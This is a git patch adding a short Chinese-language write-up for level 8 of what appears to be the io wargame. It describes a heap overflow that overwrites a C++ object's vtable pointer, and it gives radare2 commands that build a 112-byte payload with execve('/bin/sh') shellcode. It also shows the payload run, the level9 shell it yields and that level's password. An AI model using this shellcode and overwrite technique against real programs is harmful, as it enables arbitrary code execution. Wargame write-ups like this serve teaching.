From 1e50c1c439ff9c39166eb98af1de489149e8b519 Mon Sep 17 00:00:00 2001
From: Iru Cai <mytbk920423@gmail.com>
Date: Mon, 8 Oct 2018 16:42:18 +0800
Subject: lv8

---
 level08 | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 level08

(limited to 'level08')

diff --git a/level08 b/level08
new file mode 100644
index 0000000..12206d9
--- /dev/null
+++ b/level08
@@ -0,0 +1,18 @@
+用 gdb 调试，发现 five 和 six 在堆中的地址为 0x0804ea10 和 0x0804ea80. class Number 的虚表指针在对象的偏移 0 处，需要用 112 字节覆盖 six 的虚表指针。虚表指针的第一个字段（偏移为 0）为 operator+.
+
+试了下把 shellcode 写进 five->annotation 中，直接进 level9，看来这题堆区是可执行的。
+
+level8@io:~$ r2 malloc://512
+ -- Try with ASAN, and be amazed
+[0x00000000]> wxs 18ea0408
+[0x00000004]> wxs 31c004c9cd8089c389c189c231c004d0cd8031c0040bbb1f43583081f33030303053682f62696e89e331c931d2cd80
+[0x00000033]> 100 wxs 61
+[0x00000097]> wx 14ea0408 @ 108
+[0x00000097]> wtf /tmp/exp.bin 112 @ 0
+dumped 0x70 bytes
+Dumped 112 bytes from 0x00000000 into /tmp/exp.bin
+[0x00000097]> q
+
+level8@io:~$ /levels/level08 `cat /tmp/exp.bin`
+level9@io:/home/level8$ cat /home/level9/.pass
+ise9uHhjOhZd0K4G
-- 
cgit v1.2.3